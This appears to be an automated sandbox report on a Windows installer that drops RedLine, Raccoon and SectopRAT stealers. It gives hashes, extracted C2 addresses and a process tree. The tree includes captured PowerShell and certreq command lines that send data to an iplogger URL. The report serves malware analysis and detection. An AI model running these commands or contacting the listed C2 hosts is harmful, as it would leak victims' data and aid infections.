Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23/10/2024, 06:51

General

  • Target

    6d929b7f6b456a9b24d50dbbfd87624d_JaffaCakes118.exe

  • Size

    3.1MB

  • MD5

    6d929b7f6b456a9b24d50dbbfd87624d

  • SHA1

    824445eb19c92eaf624748c3c0fc6e77a7f617a6

  • SHA256

    e545bebf9e0380572b0d7440696cc1c4e687e4c100640f1693c223a91e71b9c5

  • SHA512

    3282d60fa41f0679408053d67e1204c5e9325d7958646ee2e0edc2d06e9bc61b60c51e7e34630eaae051eb6a0371ffa575dd7bc14e2432938285e8c42bb3c1a8

  • SSDEEP

    98304:ZC0zr0EE1XpTjfP8nkinI648yhPymUQ1Xu2HAOcBCkfp:jSEnlnIv8y8mR1Xkfp

Malware Config

Extracted

Family

redline

Botnet

Venita_test_2k_05.08.21

C2

yspasenana.xyz:80

Extracted

Family

redline

Botnet

ww

C2

boterov.com:12427

Extracted

Family

redline

Botnet

WhiteMIX

C2

185.215.113.62:51929

Extracted

Family

raccoon

Version

1.7.3

Botnet

74bec5afbb1ce85c30df15e910825c3eaa274ac4

Attributes
  • url4cnc

    https://telete.in/berdyshop12

rc4.plain
rc4.plain

Signatures

  • Raccoon

    Raccoon is an infostealer written in C++ and first seen in 2019.

  • Raccoon Stealer V1 payload 2 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 3 IoCs
  • SectopRAT

    SectopRAT is a remote access trojan first seen in November 2019.

  • SectopRAT payload 3 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Powershell Invoke Web Request.

  • Executes dropped EXE 12 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Program Files directory 14 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 13 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\6d929b7f6b456a9b24d50dbbfd87624d_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\6d929b7f6b456a9b24d50dbbfd87624d_JaffaCakes118.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2840
    • C:\Users\Admin\AppData\Local\Temp\is-6TDNC.tmp\6d929b7f6b456a9b24d50dbbfd87624d_JaffaCakes118.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-6TDNC.tmp\6d929b7f6b456a9b24d50dbbfd87624d_JaffaCakes118.tmp" /SL5="$D004E,3033387,58368,C:\Users\Admin\AppData\Local\Temp\6d929b7f6b456a9b24d50dbbfd87624d_JaffaCakes118.exe"
      2⤵
      • Executes dropped EXE
      • Drops file in Program Files directory
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of WriteProcessMemory
      PID:2196
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1lzUx"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Drops file in System32 directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3496
      • C:\Windows\SysWOW64\cmd.exe
        "cmd.exe" /c certreq -post -config https://iplogger.org/1lzUx %windir%\\win.ini %temp%\\2 & del %temp%\\2
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3908
        • C:\Windows\SysWOW64\certreq.exe
          certreq -post -config https://iplogger.org/1lzUx C:\Windows\\win.ini C:\Users\Admin\AppData\Local\Temp\\2
          4⤵
          • System Location Discovery: System Language Discovery
          PID:4828
      • C:\Program Files (x86)\My faster4upc\6.exe
        "C:\Program Files (x86)\My faster4upc\6.exe"
        3⤵
        • Executes dropped EXE
        • Checks processor information in registry
        • Suspicious use of AdjustPrivilegeToken
        PID:3680
      • C:\Program Files (x86)\My faster4upc\i.exe
        "C:\Program Files (x86)\My faster4upc\i.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4104
        • C:\Program Files (x86)\My faster4upc\i.exe
          "C:\Program Files (x86)\My faster4upc\i.exe"
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          PID:2340
      • C:\Program Files (x86)\My faster4upc\l.exe
        "C:\Program Files (x86)\My faster4upc\l.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1328
        • C:\Program Files (x86)\My faster4upc\l.exe
          "C:\Program Files (x86)\My faster4upc\l.exe"
          4⤵
          • Executes dropped EXE
          PID:728
        • C:\Program Files (x86)\My faster4upc\l.exe
          "C:\Program Files (x86)\My faster4upc\l.exe"
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          PID:4692
      • C:\Program Files (x86)\My faster4upc\d.exe
        "C:\Program Files (x86)\My faster4upc\d.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3376
        • C:\Program Files (x86)\My faster4upc\d.exe
          "C:\Program Files (x86)\My faster4upc\d.exe"
          4⤵
          • Executes dropped EXE
          PID:4676
        • C:\Program Files (x86)\My faster4upc\d.exe
          "C:\Program Files (x86)\My faster4upc\d.exe"
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          PID:5096
      • C:\Program Files (x86)\My faster4upc\h.exe
        "C:\Program Files (x86)\My faster4upc\h.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2448
        • C:\Program Files (x86)\My faster4upc\h.exe
          "C:\Program Files (x86)\My faster4upc\h.exe"
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:3252

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Program Files (x86)\My faster4upc\6.exe

    Filesize

    79KB

    MD5

    13a502c9f8aae935bc791b4e0915cb92

    SHA1

    96e2e065a9ce134ccfaed69eb98a948e7268dd8c

    SHA256

    d29f6b6f042629c7f974d78ede2cf65b79d3433dc1d053f9a6a2c1e6c91f7014

    SHA512

    9454d7ea696287e1b5e8e91890bba8f0299f8e49fe7367a753c97a8efe31264f4f53746245acb3daafcda7420b200d92e224d9ca1d4efc8be1e7cefb18306e0f

  • C:\Program Files (x86)\My faster4upc\d.exe

    Filesize

    866KB

    MD5

    db2d2f94bcfeb06b85733ce987021631

    SHA1

    3bc5b711013325389fd9fd48da5bf3b88d334534

    SHA256

    90a34ff8fafba955d485abc66cd6f696dc44b532634928883a54f95472e26479

    SHA512

    707f8d9640f832fece1b844ae99d750cd9081ba24d41f922e2fa49bec7b6593fef4ac3116d1d900614fd81d3f2c26e6f6abaea388ba45fa4bdc8569e1d277bcb

  • C:\Program Files (x86)\My faster4upc\h.exe

    Filesize

    1.3MB

    MD5

    b732e1206cd6538ad6fd98ea0a17afa7

    SHA1

    3c5eff7e6159e2ca850012dbf345bff7ff480df9

    SHA256

    9a525086779f276a19bbe2a131cfbd575ade18a4eb6e46f308536d518f0a5210

    SHA512

    7a7295b869eb9fa3ecd84ee028e12a66629bb507ec0f0c5a5e81061644e5a3335e9d8a0d347d1510a6570d34ee601ab05d79c8611ce5f71df1ecd139d68e5e4f

  • C:\Program Files (x86)\My faster4upc\i.exe

    Filesize

    1021KB

    MD5

    765fac3632651ffa759112181cff4069

    SHA1

    f942322b958ceef93beceeed3047a112290af215

    SHA256

    a7197ddb532acf2a80183545cce111c23feba2cd75356361fe50b5d9a467a0b5

    SHA512

    896d37822f4a351da2f341e42fb3b71391bb3b424f7f5f2b49e43aa6e760579e8b617dcdbba9d038d11c2cda6df3a48aec22129c5c60176684f3ae6ce4f55455

  • C:\Program Files (x86)\My faster4upc\l.exe

    Filesize

    852KB

    MD5

    f1bd777d04ad048a7a1ce3245799530c

    SHA1

    300cb69859f77c7a8e0787e9d4befaf4bd1ee80b

    SHA256

    384c256fc08b3763a8aa8dbfd255b348a975575a198b3b443ee594bb5a4d4520

    SHA512

    eb336c56b0039fc3c40ce2c3c1acf35b213889b33aefab9a9ee63fff398ace5c356f9137752f2f74bfef6a6ebc3335c8f3ba92651c0cee862be3306ffaa81c61

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\i.exe.log

    Filesize

    1KB

    MD5

    17573558c4e714f606f997e5157afaac

    SHA1

    13e16e9415ceef429aaf124139671ebeca09ed23

    SHA256

    c18db6aecad2436da4a63ff26af4e3a337cca48f01c21b8db494fe5ccc60e553

    SHA512

    f4edf13f05a0d142e4dd42802098c8c44988ee8869621a62c2b565a77c9a95857f636583ff8d6d9baa366603d98b9bfbf1fc75bc6f9f8f83c80cb1215b2941cc

  • C:\Users\Admin\AppData\Local\Temp\2

    Filesize

    116B

    MD5

    ec6aae2bb7d8781226ea61adca8f0586

    SHA1

    d82b3bad240f263c1b887c7c0cc4c2ff0e86dfe3

    SHA256

    b02fffaba9e664ff7840c82b102d6851ec0bb148cec462cef40999545309e599

    SHA512

    aa62a8cd02a03e4f462f76ae6ff2e43849052ce77cca3a2ccf593f6669425830d0910afac3cf2c46dd385454a6fb3b4bd604ae13b9586087d6f22de644f9dfc7

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_n2txyeox.vfw.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\is-6TDNC.tmp\6d929b7f6b456a9b24d50dbbfd87624d_JaffaCakes118.tmp

    Filesize

    702KB

    MD5

    1afbd25db5c9a90fe05309f7c4fbcf09

    SHA1

    baf330b5c249ca925b4ea19a52fe8b2c27e547fa

    SHA256

    3bb0ee5569fe5453c6b3fa25aa517b925d4f8d1f7ba3475e58fa09c46290658c

    SHA512

    3a448f06862c6d163fd58b68b836d866ae513e04a69774abf5a0c5b7df74f5b9ee37240083760185618c5068bf93e7fd812e76b3e530639111fb1d74f4d28419

  • memory/1328-105-0x00000000087B0000-0x0000000008838000-memory.dmp

    Filesize

    544KB

  • memory/1328-72-0x0000000006BA0000-0x0000000006C22000-memory.dmp

    Filesize

    520KB

  • memory/1328-47-0x0000000000E20000-0x0000000000EFC000-memory.dmp

    Filesize

    880KB

  • memory/1328-106-0x0000000006E70000-0x0000000006E90000-memory.dmp

    Filesize

    128KB

  • memory/1328-50-0x0000000005880000-0x0000000005912000-memory.dmp

    Filesize

    584KB

  • memory/2196-9-0x0000000000400000-0x00000000004BF000-memory.dmp

    Filesize

    764KB

  • memory/2196-58-0x0000000000400000-0x00000000004BF000-memory.dmp

    Filesize

    764KB

  • memory/2196-85-0x0000000000400000-0x00000000004BF000-memory.dmp

    Filesize

    764KB

  • memory/2196-6-0x0000000000400000-0x00000000004BF000-memory.dmp

    Filesize

    764KB

  • memory/2340-93-0x0000000005960000-0x0000000005F78000-memory.dmp

    Filesize

    6.1MB

  • memory/2340-97-0x0000000005750000-0x000000000585A000-memory.dmp

    Filesize

    1.0MB

  • memory/2340-89-0x0000000000400000-0x000000000041E000-memory.dmp

    Filesize

    120KB

  • memory/2340-94-0x0000000005400000-0x0000000005412000-memory.dmp

    Filesize

    72KB

  • memory/2340-95-0x00000000054A0000-0x00000000054DC000-memory.dmp

    Filesize

    240KB

  • memory/2340-96-0x00000000054E0000-0x000000000552C000-memory.dmp

    Filesize

    304KB

  • memory/2448-113-0x000000000C190000-0x000000000C228000-memory.dmp

    Filesize

    608KB

  • memory/2448-112-0x0000000008B00000-0x0000000008BF0000-memory.dmp

    Filesize

    960KB

  • memory/2448-46-0x0000000000DE0000-0x0000000000F26000-memory.dmp

    Filesize

    1.3MB

  • memory/2448-74-0x0000000008750000-0x000000000883E000-memory.dmp

    Filesize

    952KB

  • memory/2840-8-0x0000000000400000-0x0000000000415000-memory.dmp

    Filesize

    84KB

  • memory/2840-2-0x0000000000401000-0x000000000040C000-memory.dmp

    Filesize

    44KB

  • memory/2840-86-0x0000000000400000-0x0000000000415000-memory.dmp

    Filesize

    84KB

  • memory/2840-0-0x0000000000400000-0x0000000000415000-memory.dmp

    Filesize

    84KB

  • memory/3252-114-0x0000000000400000-0x0000000000495000-memory.dmp

    Filesize

    596KB

  • memory/3252-117-0x0000000000400000-0x0000000000495000-memory.dmp

    Filesize

    596KB

  • memory/3376-49-0x00000000053F0000-0x0000000005994000-memory.dmp

    Filesize

    5.6MB

  • memory/3376-73-0x00000000053C0000-0x00000000053D6000-memory.dmp

    Filesize

    88KB

  • memory/3376-44-0x0000000000420000-0x00000000004FE000-memory.dmp

    Filesize

    888KB

  • memory/3376-45-0x0000000004D30000-0x0000000004DCC000-memory.dmp

    Filesize

    624KB

  • memory/3376-56-0x0000000005070000-0x00000000050C6000-memory.dmp

    Filesize

    344KB

  • memory/3376-99-0x0000000006510000-0x0000000006530000-memory.dmp

    Filesize

    128KB

  • memory/3376-98-0x0000000006B00000-0x0000000006B8A000-memory.dmp

    Filesize

    552KB

  • memory/3376-55-0x0000000004E50000-0x0000000004E5A000-memory.dmp

    Filesize

    40KB

  • memory/3496-60-0x0000000006030000-0x0000000006096000-memory.dmp

    Filesize

    408KB

  • memory/3496-77-0x0000000006720000-0x000000000676C000-memory.dmp

    Filesize

    304KB

  • memory/3496-80-0x0000000007F70000-0x00000000085EA000-memory.dmp

    Filesize

    6.5MB

  • memory/3496-81-0x0000000006BE0000-0x0000000006BFA000-memory.dmp

    Filesize

    104KB

  • memory/3496-53-0x0000000005290000-0x00000000052C6000-memory.dmp

    Filesize

    216KB

  • memory/3496-62-0x0000000006110000-0x0000000006464000-memory.dmp

    Filesize

    3.3MB

  • memory/3496-54-0x0000000005960000-0x0000000005F88000-memory.dmp

    Filesize

    6.2MB

  • memory/3496-59-0x0000000005F90000-0x0000000005FB2000-memory.dmp

    Filesize

    136KB

  • memory/3496-76-0x0000000006700000-0x000000000671E000-memory.dmp

    Filesize

    120KB

  • memory/3496-61-0x00000000060A0000-0x0000000006106000-memory.dmp

    Filesize

    408KB

  • memory/3680-43-0x0000000000DC0000-0x0000000000DD8000-memory.dmp

    Filesize

    96KB

  • memory/3680-35-0x00007FFCC0D63000-0x00007FFCC0D65000-memory.dmp

    Filesize

    8KB

  • memory/4104-75-0x00000000069D0000-0x00000000069EA000-memory.dmp

    Filesize

    104KB

  • memory/4104-87-0x00000000082D0000-0x000000000835C000-memory.dmp

    Filesize

    560KB

  • memory/4104-48-0x0000000000750000-0x0000000000856000-memory.dmp

    Filesize

    1.0MB

  • memory/4104-88-0x000000000A9F0000-0x000000000AA10000-memory.dmp

    Filesize

    128KB

  • memory/4692-108-0x0000000000400000-0x000000000041E000-memory.dmp

    Filesize

    120KB

  • memory/5096-101-0x0000000000400000-0x000000000041E000-memory.dmp

    Filesize

    120KB